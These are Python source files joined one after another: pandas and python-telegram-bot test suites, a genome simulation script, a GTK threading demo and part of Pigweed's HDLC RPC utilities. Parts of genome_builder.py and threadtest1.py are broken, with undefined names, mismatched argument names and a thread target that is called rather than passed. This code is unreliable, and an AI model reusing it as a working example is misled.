try: with open(html_encoding_file, "rb") as fobj: from_string = self.read_html( fobj.read(), encoding=encoding, index_col=0 ).pop() with open(html_encoding_file, "rb") as fobj: from_file_like = self.read_html( BytesIO(fobj.read()), encoding=encoding, index_col=0 ).pop() from_filename = self.read_html( html_encoding_file, encoding=encoding, index_col=0 ).pop() tm.assert_frame_equal(from_string, from_file_like) tm.assert_frame_equal(from_string, from_filename) except Exception: # seems utf-16/32 fail on windows if is_platform_windows(): if "16" in encoding or "32" in encoding: pytest.skip() raise def test_parse_failure_unseekable(self): # Issue #17975 if self.read_html.keywords.get("flavor") == "lxml": pytest.skip("Not applicable for lxml") class UnseekableStringIO(StringIO): def seekable(self): return False bad = UnseekableStringIO( """ <table><tr><td>spam<foobr />eggs</td></tr></table>""" ) assert self.read_html(bad) with pytest.raises(ValueError, match="passed a non-rewindable file object"): self.read_html(bad) def test_parse_failure_rewinds(self): # Issue #17975 class MockFile: def __init__(self, data): self.data = data self.at_end = False def read(self, size=None): data = "" if self.at_end else self.data self.at_end = True return data def seek(self, offset): self.at_end = False def seekable(self): return True good = MockFile("<table><tr><td>spam<br />eggs</td></tr></table>") bad = MockFile("<table><tr><td>spam<foobr />eggs</td></tr></table>") assert self.read_html(good) assert self.read_html(bad) @pytest.mark.slow def test_importcheck_thread_safety(self, datapath): # see gh-16928 class ErrorThread(threading.Thread): def run(self): try: super().run() except Exception as err: self.err = err else: self.err = None # force import check by reinitalising global vars in html.py reload(pandas.io.html) filename = datapath("io", "data", "html", "valid_markup.html") helper_thread1 = ErrorThread(target=self.read_html, args=(filename,)) helper_thread2 = ErrorThread(target=self.read_html, args=(filename,)) helper_thread1.start() helper_thread2.start() while helper_thread1.is_alive() or helper_thread2.is_alive(): pass assert None is helper_thread1.err is helper_thread2.err def test_parse_path_object(self, datapath): # GH 37705 file_path_string = datapath("io", "data", "html", "spam.html") file_path = Path(file_path_string) df1 = self.read_html(file_path_string)[0] df2 = self.read_html(file_path)[0] tm.assert_frame_equal(df1, df2)
test_updater.py
#!/usr/bin/env python # # A library that provides a Python interface to the Telegram Bot API # Copyright (C) 2015-2020 # Leandro Toledo de Souza <devs@python-telegram-bot.org> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Lesser Public License for more details. # # You should have received a copy of the GNU Lesser Public License # along with this program. If not, see [http://www.gnu.org/licenses/]. import logging import os import signal import sys import asyncio from flaky import flaky from functools import partial from queue import Queue from random import randrange from threading import Thread, Event from time import sleep try: # python2 from urllib2 import urlopen, Request, HTTPError except ImportError: # python3 from urllib.request import Request, urlopen from urllib.error import HTTPError import pytest from future.builtins import bytes from telegram import TelegramError, Message, User, Chat, Update, Bot from telegram.error import Unauthorized, InvalidToken, TimedOut, RetryAfter from telegram.ext import Updater, Dispatcher, BasePersistence signalskip = pytest.mark.skipif(sys.platform == 'win32', reason='Can\'t send signals without stopping ' 'whole process on windows') if sys.platform.startswith("win") and sys.version_info >= (3, 8): """set default asyncio policy to be compatible with tornado Tornado 6 (at least) is not compatible with the default asyncio implementation on Windows Pick the older SelectorEventLoopPolicy on Windows if the known-incompatible default policy is in use. do this as early as possible to make it a low priority and overrideable ref: https://github.com/tornadoweb/tornado/issues/2608 TODO: if/when tornado supports the defaults in asyncio, remove and bump tornado requirement for py38 Copied from https://github.com/ipython/ipykernel/pull/456/ """ try: from asyncio import ( WindowsProactorEventLoopPolicy, WindowsSelectorEventLoopPolicy, ) except ImportError: pass # not affected else: if type(asyncio.get_event_loop_policy()) is WindowsProactorEventLoopPolicy: # WindowsProactorEventLoopPolicy is not compatible with tornado 6 # fallback to the pre-3.8 default of Selector asyncio.set_event_loop_policy(WindowsSelectorEventLoopPolicy()) class TestUpdater(object): message_count = 0 received = None attempts = 0 err_handler_called = Event() cb_handler_called = Event() @pytest.fixture(autouse=True) def reset(self): self.message_count = 0 self.received = None self.attempts = 0 self.err_handler_called.clear() self.cb_handler_called.clear() def error_handler(self, bot, update, error): self.received = error.message self.err_handler_called.set() def callback(self, bot, update): self.received = update.message.text self.cb_handler_called.set() # TODO: test clean= argument of Updater._bootstrap @pytest.mark.parametrize(('error',), argvalues=[(TelegramError('Test Error 2'),), (Unauthorized('Test Unauthorized'),)], ids=('TelegramError', 'Unauthorized')) def test_get_updates_normal_err(self, monkeypatch, updater, error): def test(*args, **kwargs): raise error monkeypatch.setattr(updater.bot, 'get_updates', test) monkeypatch.setattr(updater.bot, 'set_webhook', lambda *args, **kwargs: True) updater.dispatcher.add_error_handler(self.error_handler) updater.start_polling(0.01) # Make sure that the error handler was called self.err_handler_called.wait() assert self.received == error.message # Make sure that Updater polling thread keeps running self.err_handler_called.clear() self.err_handler_called.wait() def test_get_updates_bailout_err(self, monkeypatch, updater, caplog): error = InvalidToken() def test(*args, **kwargs): raise error with caplog.at_level(logging.DEBUG): monkeypatch.setattr(updater.bot, 'get_updates', test) monkeypatch.setattr(updater.bot, 'set_webhook', lambda *args, **kwargs: True) updater.dispatcher.add_error_handler(self.error_handler) updater.start_polling(0.01) assert self.err_handler_called.wait(1) is not True sleep(1) # NOTE: This test might hit a race condition and fail (though the 1 seconds delay above # should work around it). # NOTE: Checking Updater.running is problematic because it is not set to False when there's # an unhandled exception. # TODO: We should have a way to poll Updater status and decide if it's running or not. import pprint pprint.pprint([rec.getMessage() for rec in caplog.get_records('call')]) assert any('unhandled exception in Bot:{}:updater'.format(updater.bot.id) in rec.getMessage() for rec in caplog.get_records('call')) @pytest.mark.parametrize(('error',), argvalues=[(RetryAfter(0.01),), (TimedOut(),)], ids=('RetryAfter', 'TimedOut')) def test_get_updates_retries(self, monkeypatch, updater, error): event = Event() def test(*args, **kwargs): event.set() raise error monkeypatch.setattr(updater.bot, 'get_updates', test) monkeypatch.setattr(updater.bot, 'set_webhook', lambda *args, **kwargs: True) updater.dispatcher.add_error_handler(self.error_handler) updater.start_polling(0.01) # Make sure that get_updates was called, but not the error handler event.wait() assert self.err_handler_called.wait(0.5) is not True assert self.received != error.message # Make sure that Updater polling thread keeps running event.clear() event.wait() assert self.err_handler_called.wait(0.5) is not True def test_webhook(self, monkeypatch, updater): q = Queue() monkeypatch.setattr(updater.bot, 'set_webhook', lambda *args, **kwargs: True) monkeypatch.setattr(updater.bot, 'delete_webhook', lambda *args, **kwargs: True) monkeypatch.setattr('telegram.ext.Dispatcher.process_update', lambda _, u: q.put(u)) ip = '127.0.0.1' port = randrange(1024, 49152) # Select random port updater.start_webhook( ip, port, url_path='TOKEN') sleep(.2) try: # Now, we send an update to the server via urlopen update = Update(1, message=Message(1, User(1, '', False), None, Chat(1, ''), text='Webhook')) self._send_webhook_msg(ip, port, update.to_json(), 'TOKEN') sleep(.2) assert q.get(False) == update # Returns 404 if path is incorrect with pytest.raises(HTTPError) as excinfo: self._send_webhook_msg(ip, port, None, 'webookhandler.py') assert excinfo.value.code == 404 with pytest.raises(HTTPError) as excinfo: self._send_webhook_msg(ip, port, None, 'webookhandler.py', get_method=lambda: 'HEAD') assert excinfo.value.code == 404 # Test multiple shutdown() calls updater.httpd.shutdown() finally: updater.httpd.shutdown() sleep(.2) assert not updater.httpd.is_running updater.stop() def test_webhook_ssl(self, monkeypatch, updater): monkeypatch.setattr(updater.bot, 'set_webhook', lambda *args, **kwargs: True) monkeypatch.setattr(updater.bot, 'delete_webhook', lambda *args, **kwargs: True) ip = '127.0.0.1' port = randrange(1024, 49152) # Select random port tg_err = False try: updater._start_webhook( ip, port, url_path='TOKEN', cert='./tests/test_updater.py', key='./tests/test_updater.py', bootstrap_retries=0, clean=False, webhook_url=None, allowed_updates=None) except TelegramError: tg_err = True assert tg_err def test_webhook_no_ssl(self, monkeypatch, updater): q = Queue() monkeypatch.setattr(updater.bot, 'set_webhook', lambda *args, **kwargs: True) monkeypatch.setattr(updater.bot, 'delete_webhook', lambda *args, **kwargs: True) monkeypatch.setattr('telegram.ext.Dispatcher.process_update', lambda _, u: q.put(u)) ip = '127.0.0.1' port = randrange(1024, 49152) # Select random port updater.start_webhook(ip, port, webhook_url=None) sleep(.2) # Now, we send an update to the server via urlopen update = Update(1, message=Message(1, User(1, '', False), None, Chat(1, ''), text='Webhook 2')) self._send_webhook_msg(ip, port, update.to_json()) sleep(.2) assert q.get(False) == update updater.stop() def test_webhook_default_quote(self, monkeypatch, updater): updater._default_quote = True q = Queue() monkeypatch.setattr(updater.bot, 'set_webhook', lambda *args, **kwargs: True) monkeypatch.setattr(updater.bot, 'delete_webhook', lambda *args, **kwargs: True) monkeypatch.setattr('telegram.ext.Dispatcher.process_update', lambda _, u: q.put(u)) ip = '127.0.0.1' port = randrange(1024, 49152) # Select random port updater.start_webhook( ip, port, url_path='TOKEN') sleep(.2) # Now, we send an update to the server via urlopen update = Update(1, message=Message(1, User(1, '', False), None, Chat(1, ''), text='Webhook')) self._send_webhook_msg(ip, port, update.to_json(), 'TOKEN') sleep(.2) # assert q.get(False) == update assert q.get(False).message.default_quote is True updater.stop() @pytest.mark.skipif(not (sys.platform.startswith("win") and sys.version_info >= (3, 8)), reason="only relevant on win with py>=3.8") def test_webhook_tornado_win_py38_workaround(self, updater, monkeypatch): updater._default_quote = True q = Queue() monkeypatch.setattr(updater.bot, 'set_webhook', lambda *args, **kwargs: True) monkeypatch.setattr(updater.bot, 'delete_webhook', lambda *args, **kwargs: True) monkeypatch.setattr('telegram.ext.Dispatcher.process_update', lambda _, u: q.put(u)) ip = '127.0.0.1' port = randrange(1024, 49152) # Select random port updater.start_webhook( ip, port, url_path='TOKEN') sleep(.2) try: from asyncio import (WindowsSelectorEventLoopPolicy) except ImportError: pass # not affected else: assert isinstance(asyncio.get_event_loop_policy(), WindowsSelectorEventLoopPolicy) updater.stop() @pytest.mark.parametrize(('error',), argvalues=[(TelegramError(''),)], ids=('TelegramError',)) def test_bootstrap_retries_success(self, monkeypatch, updater, error): retries = 2 def attempt(*args, **kwargs): if self.attempts < retries: self.attempts += 1 raise error monkeypatch.setattr(updater.bot, 'set_webhook', attempt) updater.running = True updater._bootstrap(retries, False, 'path', None, bootstrap_interval=0) assert self.attempts == retries @pytest.mark.parametrize(('error', 'attempts'), argvalues=[(TelegramError(''), 2), (Unauthorized(''), 1), (InvalidToken(), 1)], ids=('TelegramError', 'Unauthorized', 'InvalidToken')) def test_bootstrap_retries_error(self, monkeypatch, updater, error, attempts): retries = 1 def attempt(*args, **kwargs): self.attempts += 1 raise error monkeypatch.setattr(updater.bot, 'set_webhook', attempt) updater.running = True with pytest.raises(type(error)): updater._bootstrap(retries, False, 'path', None, bootstrap_interval=0) assert self.attempts == attempts @flaky(3, 1) def test_webhook_invalid_posts(self, updater): ip = '127.0.0.1' port = randrange(1024, 49152) # select random port for travis thr = Thread( target=updater._start_webhook, args=(ip, port, '', None, None, 0, False, None, None)) thr.start() sleep(.2) try: with pytest.raises(HTTPError) as excinfo: self._send_webhook_msg(ip, port, '<root><bla>data</bla></root>', content_type='application/xml') assert excinfo.value.code == 403 with pytest.raises(HTTPError) as excinfo: self._send_webhook_msg(ip, port, 'dummy-payload', content_len=-2) assert excinfo.value.code == 500 # TODO: prevent urllib or the underlying from adding content-length # with pytest.raises(HTTPError) as excinfo: # self._send_webhook_msg(ip, port, 'dummy-payload', content_len=None) # assert excinfo.value.code == 411 with pytest.raises(HTTPError): self._send_webhook_msg(ip, port, 'dummy-payload', content_len='not-a-number') assert excinfo.value.code == 500 finally: updater.httpd.shutdown() thr.join() def _send_webhook_msg(self, ip, port, payload_str, url_path='', content_len=-1, content_type='application/json', get_method=None): headers = {'content-type': content_type, } if not payload_str: content_len = None payload = None else: payload = bytes(payload_str, encoding='utf-8') if content_len == -1: content_len = len(payload) if content_len is not None: headers['content-length'] = str(content_len) url = 'http://{ip}:{port}/{path}'.format(ip=ip, port=port, path=url_path) req = Request(url, data=payload, headers=headers) if get_method is not None: req.get_method = get_method return urlopen(req) def signal_sender(self, updater): sleep(0.2) while not updater.running: sleep(0.2) os.kill(os.getpid(), signal.SIGTERM) @signalskip def test_idle(self, updater, caplog): updater.start_polling(0.01) Thread(target=partial(self.signal_sender, updater=updater)).start() with caplog.at_level(logging.INFO): updater.idle() rec = caplog.records[-1] assert rec.msg.startswith('Received signal {}'.format(signal.SIGTERM)) assert rec.levelname == 'INFO' # If we get this far, idle() ran through sleep(.5) assert updater.running is False @signalskip def test_user_signal(self, updater): temp_var = {'a': 0} def user_signal_inc(signum, frame): temp_var['a'] = 1 updater.user_sig_handler = user_signal_inc updater.start_polling(0.01) Thread(target=partial(self.signal_sender, updater=updater)).start() updater.idle() # If we get this far, idle() ran through sleep(.5) assert updater.running is False assert temp_var['a'] != 0 def test_create_bot(self): updater = Updater('123:abcd') assert updater.bot is not None def test_mutual_exclude_token_bot(self): bot = Bot('123:zyxw') with pytest.raises(ValueError): Updater(token='123:abcd', bot=bot) def test_no_token_or_bot_or_dispatcher(self): with pytest.raises(ValueError): Updater() def test_mutual_exclude_bot_private_key(self): bot = Bot('123:zyxw') with pytest.raises(ValueError): Updater(bot=bot, private_key=b'key') def test_mutual_exclude_bot_dispatcher(self): dispatcher = Dispatcher(None, None) bot = Bot('123:zyxw') with pytest.raises(ValueError): Updater(bot=bot, dispatcher=dispatcher) def test_mutual_exclude_persistence_dispatcher(self): dispatcher = Dispatcher(None, None) persistence = BasePersistence() with pytest.raises(ValueError): Updater(dispatcher=dispatcher, persistence=persistence) def test_mutual_exclude_workers_dispatcher(self): dispatcher = Dispatcher(None, None) with pytest.raises(ValueError): Updater(dispatcher=dispatcher, workers=8) def test_mutual_exclude_use_context_dispatcher(self): dispatcher = Dispatcher(None, None) use_context = not dispatcher.use_context with pytest.raises(ValueError): Updater(dispatcher=dispatcher, use_context=use_context)
genome_builder.py
""" Created on June 20, 2014 @author: Joseph Korpela """ import time import random import sys import re import argparse import pickle import shutil import unittest import os import chromosome_builder import reads_mixer class genome_builder(): def __init__(self, args=None): if not args: args = self.parse_system_args() self._genome_id = args.id self._nbr_chromosome = args.nbr_chr self._chromosome_size = args.chr_size self._scale = args.scale self._use_alu = args.alu self._use_assembly = args.assembly self._allele_base_list = ["C", "T", "G", "A"] self._reads_file = "reads_" + str(self._genome_id) + ".txt" self._chromosome_reads_file = "reads_" + str(self._genome_id) + "_chr_" self._base_alu_file = "alu_" + str(self._genome_id) + ".txt" if self._use_alu: self._base_alu = self.generate_base_alu() def insert_newlines(self, sequence, line_size=80): return '\n'.join(sequence[i:i+line_size] for i in range(0, len(sequence), line_size)) def write_genome_lines_to_file(self, genome, file_object): genome = self.insert_newlines(genome, 80) file_object.write(genome) def parse_fasta(self, file_name, buffer_size=100000): """Gives buffered access to large fasta files so that the entire file doesn't need to be loaded into memory all at once. Works as a generator, yielding a block of up to buffer_size with each call. For general use, use: for sequence in parse_fasta(file_name, buffer_size) This yield sequences until the end of file or a '>' character is found, at which point it yields None Since None is yielded for '>', this can be used with multiple chromosomes separated by '>chr#' in a single file. To do so, the generator should be initialized before iterating through chromosomes, then as each chromosome is processed you can anticipate None will be yielded one time to mark the end of the current chromoeome :param file_name: the file to read in :param buffer_size: the number of characters to return for each iteration :returns: Sequences of up to size buffer_size, or None if EOF or '>' is encountered """ with open(file_name) as fasta_file: start_of_file = True buffer = "" while True: for line in fasta_file: #skip initial documentation lines if start_of_file and '>' in line: pass #each chromosome is marked by a > line, so need to catch this switch elif not start_of_file and '>' in line: if len(buffer) == 0: yield None else: #first yield the buffer, then yeild None to flag the end of the chromosome yield buffer buffer = '' yield None else: if start_of_file: start_of_file = False buffer += line.strip() if len(buffer) >= buffer_size: yield buffer[:buffer_size] buffer = buffer[buffer_size:] #clear out any remaining buffer when the file is done if len(buffer) > 0: yield buffer buffer = '' else: yield None def random_sequence(self, seq_len): return "".join(random.choice(self._allele_base_list) for i in range(seq_len)) def generate_base_alu(self): alu_len = random.randint(self._alu_min_length, self._alu_max_length) self._base_alu = self.random_sequence(alu_len) def worker(self, chromosome): args = TestSetting() args.id = self._genome_id args.chr_id = chromosome args.chr_size = self._chromosome_size args.scale = self._scale args.alu = self._use_alu args.assembly = self._use_assembly args.base_alu = random_sequence(300) gen = chromosome_builder(args) print('chromosome ' + str(chromosome) + ' generating ref genome') gen.generate_ref_genome() print('chromosome ' + str(chromosome) + ' generating donor genome') gen.generate_donor_genome() print('chromosome ' + str(chromosome) + ' generating reads') gen.generate_reads() def generate_chromosome(self): """ Generates a random reference genome with the specified number of chromosomes, each of length length_chromosome """ if self._use_alu: with open(self._base_alu_file, "w") as alu_file: self.write_genome_lines_to_file(self._base_alu, alu_file) jobs = [] for chromosome in range(1, self._num_chromosomes + 1): chr_builder = multiprocessing.Process(target=worker, name='worker') jobs.append(chr_builder) chr_builder.start() for job in jobs: job.join() mixer = reads_mixer(self._genome_id) def parse_system_args(self): parser = argparse.ArgumentParser( description="This script generates a reference and donor genome as a set " "of files. The files can be used for various computational " "genetics purposes. The following files are created: 1) " "reference genome \'ref_*.txt\' 2) mutated donor genome " "\'private_*.txt\' 3) paired-end reads \'reads_*.txt\'" "from donor genome 4) mutation answer key \'ans_*.txt\'" ) parser.add_argument( "--id", type=str, default='test', help="The name or ID of this genome for identification purposes. The " "genome id will be reflected in the generated file names." ) parser.add_argument( "--num_chr", type=int, default='1', help="The number of chromosomes to generate for the genome." ) parser.add_argument( "--chr_size", type=int, default='10', help="The size of each chromosome, multiplied by -s (scaling factor). Change " "scale with -s option" ) parser.add_argument( "-s", "--scale", type=str, choices=["k", "m", "b"], default="k", help="the amount to scale chromosome-size by. k: thousands, m: millions," " b: billions. By default, scale is k (thousands)." ) parser.add_argument( "--alu", type=str, choices=["y", "n"], default="n", help="whether to include Alus in the genome." ) parser.add_argument( "--assembly", type=str, choices=["y", "n"], default="n", help="whether to generate output for assembly (no reference genome)." ) return parser.parse_args() class TestClass(unittest.TestCase): def setUp(self): self.gen = genome_builder() def test_generate_base_alu(self): self.gen._alu_min_length = 300 self.gen._alu_max_length = 301 self.gen._base_alu = '' self.gen.generate_base_alu() self.assertTrue(len(self.gen._base_alu) >= self.gen._alu_min_length) self.assertTrue(len(self.gen._base_alu) <= self.gen._alu_max_length) for allele in self.gen._base_alu: self.assertTrue(allele in ['T','A','C','G']) def test_write_genome_lines_to_file(self): length_list = [0,1,79,80,81] for i in length_list: self.gen._alu_min_length = i self.gen._alu_max_length = i self.gen.generate_base_alu() with open('test_file', 'w') as test_file: self.gen.write_genome_lines_to_file(self.gen._base_alu, test_file) with open('test_file', 'r') as test_file: base_alu = '' for line in test_file: base_alu += str(line).strip() self.assertEqual(base_alu, self.gen._base_alu) os.remove('test_file') def test_parse_fasta(self): nbr_chr_list = [1,2,3] length_list = [1,79,80,81] for nbr_chr in nbr_chr_list: for next_len in length_list: self.gen._alu_min_length = next_len self.gen._alu_max_length = next_len self.gen.generate_base_alu() file_name = 'test_file_' + str(nbr_chr) + '_' + str(next_len) with open(file_name, 'w') as test_file: test_file.write('>test') for chr in range(1, nbr_chr + 1): test_file.write('\n>chr' + str(chr) + '\n') self.gen.write_genome_lines_to_file(self.gen._base_alu, test_file) for sequence in self.gen.parse_fasta(file_name): if sequence: base_alu = sequence self.assertEqual(base_alu, self.gen._base_alu) else: break os.remove(file_name) def test_generate_chromosome(self): args = TestSetting() args.id = 'test' args.num_chr = 1 args.chr_size = 10 args.scale = 'k' args.alu = 'n' args.assembly = 'n' self.gen = genome_gen(args) self.gen._nbr_snp = 0 self.gen._nbr_denovo_str = 0 self.gen._nbr_denovo_cnv = 0 self.gen._nbr_long_inv = 0 self.gen._nbr_long_ins = 0 self.gen._nbr_long_del = 0 self.gen._nbr_ref_alu = 0 self.gen._nbr_denovo_alu = 0 self.gen._nbr_ref_str = 0 self.gen._nbr_ref_cnv = 0 self.gen._nbr_short_inv = 0 self.gen._nbr_short_ins = 0 self.gen._nbr_short_del = 0 self.gen._cnv_mutation_amount = 0 self.gen._str_mutation_amount = 0 self.gen.generate_ref_genome() self.gen.generate_donor_genome() ref_genome = '' for sequence in self.gen.parse_fasta(self.gen._ref_genome_file): if sequence: ref_genome += sequence else: break donor_genome = '' for sequence in self.gen.parse_fasta(self.gen._priv_genome_file): if sequence: donor_genome += sequence else: break self.assertEqual(ref_genome, donor_genome) for alu in ['y', 'n']: for test_args in [[10, 'k'], [100, 'k'], [150, 'k']]: args = TestSetting() args.id = 'test' args.num_chr = 1 args.chr_size = test_args[0] args.scale = test_args[1] args.alu = alu args.assembly = 'n' self.gen = genome_gen(args) self.gen._alu_min_length = 300 self.gen._alu_max_length = 300 self.gen._alu_mutation_rate = 0.3 self.gen.generate_ref_genome() self.gen.generate_donor_genome() ref_genome = '' for sequence in self.gen.parse_fasta(self.gen._ref_genome_file): if sequence: ref_genome += sequence else: break donor_genome = '' for sequence in self.gen.parse_fasta(self.gen._priv_genome_file): if sequence: donor_genome += sequence else: break last_end = 0 for i in range(len(self.gen._mutation_list)): mutation = self.gen._mutation_list[i] self.assertTrue(ref_genome[last_end:mutation[0]] in donor_genome) last_end = mutation[1] mut_type = mutation[2] range_stt = max(0, mutation[0]-20) range_end = min(len(ref_genome)-1, mutation[0]+20) gapped_range_end = min(len(ref_genome)-1, mutation[1]+20) if mut_type == 'SNP': self.assertTrue(ref_genome[range_stt:range_end] not in donor_genome, msg='SNP ' + str(mutation[0])) elif mut_type == 'MUT_STR': new_str = mutation[3] self.assertTrue(new_str in donor_genome, msg='MUT_STR ' + str(mutation[0])) elif mut_type == 'DONOR_STR': str_seq = mutation[3] nbr_copies = mutation[4] new_str = str_seq * nbr_copies self.assertTrue(new_str in donor_genome, msg='DONOR_STR ' + str(mutation[0])) elif mut_type == 'REF_ALU': self.assertTrue(ref_genome[mutation[0]:mutation[1]] in donor_genome, msg='REF_ALU ' + str(mutation[0])) elif mut_type == 'REF_CNV': self.assertTrue(ref_genome[mutation[0]:mutation[1]] in donor_genome, msg='REF_CNV ' + str(mutation[0])) elif mut_type == 'DONOR_ALU': self.assertTrue(ref_genome[range_stt:gapped_range_end] not in donor_genome, msg='DONOR_ALU ' + str(mutation[0])) elif mut_type == 'INV': inv_seq = ref_genome[mutation[0]:mutation[1]] inv_seq = inv_seq[::-1] self.assertTrue(inv_seq in donor_genome, msg='INV ' + str(mutation[0])) elif mut_type == 'INS': self.assertTrue(ref_genome[range_stt:range_end] not in donor_genome, msg='INS ' + str(mutation[0])) elif mut_type == 'DEL': self.assertTrue(ref_genome[range_stt:gapped_range_end] not in donor_genome, msg='DEL ' + str(mutation[0])) if __name__ == '__main__': unittest.main() test_results = [] for alu in ['y', 'n']: for test in [[100, 'k'], [200, 'k'], [300, 'k'], [400, 'k']]:#, [500, 'k'], [600, 'k'], [700, 'k'], [800, 'k'], [900, 'k'], [1, 'm']]: args = TestSetting() args.id = 'test' args.num_chr = 1 args.chr_size = test[0] args.scale = test[1] args.alu = alu args.assembly = 'n' start = time.clock() gen = genome_gen(args) print('generating ref genome') gen.generate_ref_genome() print('generating donor genome') gen.generate_donor_genome() print('generating reads') gen.generate_reads() test_results.append('Test: ' + str(test[0]) + test[1] + ' time: ' + str(time.clock() - start)) for res in test_results: print(res)
threadtest1.py
import threading import time import gi gi.require_version("Gtk", "3.0") from gi.repository import GLib, Gtk, GObject def app_main(): win = Gtk.Window(default_height=50, default_width=300) win.connect("destroy", Gtk.main_quit) progress = Gtk.ProgressBar(show_text=True) win.add(progress) def update_progress(i): progress.pulse() progress.set_text(str(i)) return False def example_target(): for i in range(50): GLib.idle_add(update_progress, i) time.sleep(0.2) win.show_all() thread = threading.Thread(target=example_target()) thread.daemon = True thread.start() if __name__ == '__main__': app_main() Gtk.main()
rpc.py
# Copyright 2020 The Pigweed Authors # # Licensed under the Apache License, Version 2.0 (the "License"); you may not # use this file except in compliance with the License. You may obtain a copy of # the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations under # the License. """Utilities for using HDLC with pw_rpc.""" from concurrent.futures import ThreadPoolExecutor import io import logging from queue import SimpleQueue import sys import threading import time import socket import subprocess from typing import (Any, BinaryIO, Callable, Dict, Iterable, List, NoReturn, Optional, Sequence, Union) from pw_protobuf_compiler import python_protos import pw_rpc from pw_rpc import callback_client from pw_hdlc.decode import Frame, FrameDecoder from pw_hdlc import encode _LOG = logging.getLogger(__name__) STDOUT_ADDRESS = 1 DEFAULT_ADDRESS = ord('R') def channel_output(writer: Callable[[bytes], Any], address: int = DEFAULT_ADDRESS, delay_s: float = 0) -> Callable[[bytes], None]: """Returns a function that can be used as a channel output for pw_rpc.""" if delay_s: def slow_write(data: bytes) -> None: """Slows down writes in case unbuffered serial is in use.""" for byte in data: time.sleep(delay_s) writer(bytes([byte])) return lambda data: slow_write(encode.ui_frame(address, data)) def write_hdlc(data: bytes): frame = encode.ui_frame(address, data) _LOG.debug('Write %2d B: %s', len(frame), frame) writer(frame) return write_hdlc def _handle_error(frame: Frame) -> None: _LOG.error('Failed to parse frame: %s', frame.status.value) _LOG.debug('%s', frame.data) FrameHandlers = Dict[int, Callable[[Frame], Any]] def read_and_process_data(read: Callable[[], bytes], on_read_error: Callable[[Exception], Any], frame_handlers: FrameHandlers, error_handler: Callable[[Frame], Any] = _handle_error, handler_threads: Optional[int] = 1) -> NoReturn: """Continuously reads and handles HDLC frames. Passes frames to an executor that calls frame handler functions in other threads. """ def handle_frame(frame: Frame): try: if not frame.ok(): error_handler(frame) return try: frame_handlers[frame.address](frame) except KeyError: _LOG.warning('Unhandled frame for address %d: %s', frame.address, frame) except: # pylint: disable=bare-except _LOG.exception('Exception in HDLC frame handler thread') decoder = FrameDecoder() # Execute callbacks in a ThreadPoolExecutor to decouple reading the input # stream from handling the data. That way, if a handler function takes a # long time or crashes, this reading thread is not interrupted. with ThreadPoolExecutor(max_workers=handler_threads) as executor: while True: try: data = read() except Exception as exc: # pylint: disable=broad-except on_read_error(exc) continue if data: _LOG.debug('Read %2d B: %s', len(data), data) for frame in decoder.process_valid_frames(data): executor.submit(handle_frame, frame) def write_to_file(data: bytes, output: BinaryIO = sys.stdout.buffer): output.write(data + b'\n') output.flush() def default_channels(write: Callable[[bytes], Any]) -> List[pw_rpc.Channel]: return [pw_rpc.Channel(1, channel_output(write))] PathsModulesOrProtoLibrary = Union[Iterable[python_protos.PathOrModule], python_protos.Library] class HdlcRpcClient: """An RPC client configured to run over HDLC.""" def __init__(self, read: Callable[[], bytes], paths_or_modules: PathsModulesOrProtoLibrary, channels: Iterable[pw_rpc.Channel], output: Callable[[bytes], Any] = write_to_file, client_impl: pw_rpc.client.ClientImpl = None): """Creates an RPC client configured to communicate using HDLC. Args: read: Function that reads bytes; e.g serial_device.read. paths_or_modules: paths to .proto files or proto modules channel: RPC channels to use for output output: where to write "stdout" output from the device """ if isinstance(paths_or_modules, python_protos.Library): self.protos = paths_or_modules else: self.protos = python_protos.Library.from_paths(paths_or_modules) if client_impl is None: client_impl = callback_client.Impl() self.client = pw_rpc.Client.from_modules(client_impl, channels, self.protos.modules()) frame_handlers: FrameHandlers = { DEFAULT_ADDRESS: self._handle_rpc_packet, STDOUT_ADDRESS: lambda frame: output(frame.data), } # Start background thread that reads and processes RPC packets. threading.Thread(target=read_and_process_data, daemon=True, args=(read, lambda exc: None, frame_handlers)).start() def rpcs(self, channel_id: int = None) -> Any: """Returns object for accessing services on the specified channel. This skips some intermediate layers to make it simpler to invoke RPCs from an HdlcRpcClient. If only one channel is in use, the channel ID is not necessary. """ if channel_id is None: return next(iter(self.client.channels())).rpcs return self.client.channel(channel_id).rpcs def _handle_rpc_packet(self, frame: Frame) -> None: if not self.client.process_packet(frame.data): _LOG.error('Packet not handled by RPC client: %s', frame.data) def _try_connect(sock: socket.socket, port: int, attempts: int = 10) -> None: """Tries to connect to the specified port up to the given number of times. This is helpful when connecting to a process that was started by this script. The process may need time to start listening for connections, and that length of time can vary. This retries with a short delay rather than having to wait for the worst case delay every time. """ while True: attempts -= 1 time.sleep(0.001) try: sock.connect(('localhost', port)) return except ConnectionRefusedError: if attempts <= 0: raise class SocketSubprocess: """Executes a subprocess and connects to it with a socket.""" def __init__(self, command: Sequence, port: int) -> None: self._server_process = subprocess.Popen(command, stdin=subprocess.PIPE) self.stdin = self._server_process.stdin sock = None try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) _try_connect(sock, port) except: if sock: sock.close() self._server_process.terminate() self._server_process.communicate() raise self.socket: socket.socket = sock # 🧦 def close(self) -> None: try: self.socket.close() finally: self._server_process.terminate() self._server_process.communicate() def __enter__(self) -> 'SocketSubprocess': return self def __exit__(self, exc_type, exc_value, traceback) -> None: self.close() class HdlcRpcLocalServerAndClient: """Runs an RPC server in a subprocess and connects to it over a socket. This can be used to run a local RPC server in an integration test. """ def __init__(self, server_command: Sequence, port: int, protos: PathsModulesOrProtoLibrary) -> None: self.server = SocketSubprocess(server_command, port) self._bytes_queue: 'SimpleQueue[bytes]' = SimpleQueue() self._read_thread = threading.Thread(target=self._read_from_socket) self._read_thread.start() self.output = io.BytesIO() self.client = HdlcRpcClient( self._bytes_queue.get, protos, default_channels(self.server.socket.sendall), self.output.write).client def _read_from_socket(self): while True: data = self.server.socket.recv(4096) self._bytes_queue.put(data) if not data: return def close(self): self.server.close() self.output.close() self._read_thread.join() def __enter__(self) -> 'HdlcRpcLocalServerAndClient': return self def __exit__(self, exc_type, exc_value, 